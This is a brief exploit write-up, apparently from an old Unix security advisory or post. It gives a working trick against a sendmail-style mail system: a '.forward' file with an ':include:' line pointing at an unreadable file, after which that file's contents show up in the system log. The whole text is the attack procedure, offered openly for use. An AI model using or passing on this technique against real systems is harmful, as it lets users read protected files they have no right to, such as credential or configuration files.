Exploit:

   # a stupid bug, but it works

   echo ":include:/unreadable/file" > .forward mail
   that account from another account  and  then go
   looking  through  the  /var/syslog/messages
   you will see lines from the unreadable file.